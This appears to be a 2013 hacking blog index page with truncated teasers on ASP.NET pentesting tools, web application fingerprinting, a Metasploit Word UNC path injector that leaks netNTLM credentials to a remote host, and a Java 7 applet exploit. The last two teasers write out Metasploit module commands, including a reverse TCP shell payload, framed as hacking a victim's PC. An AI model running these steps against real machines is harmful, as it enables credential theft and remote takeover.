This is default featured slide 1 title

Go to Blogger edit html and find these sentences.Now replace these sentences with your own descriptions.

12345

Sunday, March 24, 2013

ASP.NET web-application Testing

1:43 AM    No comments

Lens is an open-source ethical hacking tool specialized to penetration testing of ASP.NET web applications. Lens is written in WPF 4 and its internal modular architecture allows us to easily add new tests to the system.You can Download source code from following website.http://ethicalhackingaspnet.codeplex.com/releases/view/52623Currently the following tests are available:(1)Viewstate eavesdroping & information disclosure(2)Session Fixation(3)Oracle...

Read More

Tuesday, March 19, 2013

Web-application Fingerprinting

1:20 AM    No comments

Methods of Web Application Finger PrintingHistorically Identification of Open Source applications have been easier as the behavior pattern and all the source codes are publically open. In the early days web application identification was as simple as looking in the footer of the Page of text like “Powered by <XYZ>”. However as more and more Server admin became aware of this simple stuff so is the Pen Testers approach became more complex towards...

Read More

Friday, March 8, 2013

Microsoft Word UNC Path Injector

6:11 AM  ,  No comments

This module modifies a .docx file that will, upon opening, submit stored netNTLM credentials to a remote host. It can also create an empty docx file. If emailed the receiver needs to put the document in editing mode before the remote server will be contacted. Preview and read-only mode do not work. Verified to work with Microsoft Word 2003, 2007 and 2010 as of January 2013. In order to get the hashes the auxiliary/server/capture/smb module can be used.First Hack the Victim PC Using Metaspolit (click here)msfconsoleuse auxiliary/docx/word_unc_injectormsf...

Read More

Sunday, March 3, 2013

Hack Remote P.C. using latest java vulnerability

10:17 AM  ,  No comments

P { margin-bottom: 0.08in; }A:link { } JAVA APPLET JMX REMOTE CODE EXECUTION:-This vulnerability is exploited in February 2013.Additionally, this module bypasses default security settings introduced in Java 7 Update 10 to run unsigned applet without displaying any warning to the user.Any O.S. Which is running java 7 update 10 is exploitable. Just attacker require metasploit.Open your terminal & type following codemsfconsoleuse exploit/windows/browser/java_jre17_jmxbean_2 msf exploit (java_jre17_jmxbean_2)>set payload java/shell_reverse_tcp...

Read More
Subscribe to: Posts (Atom)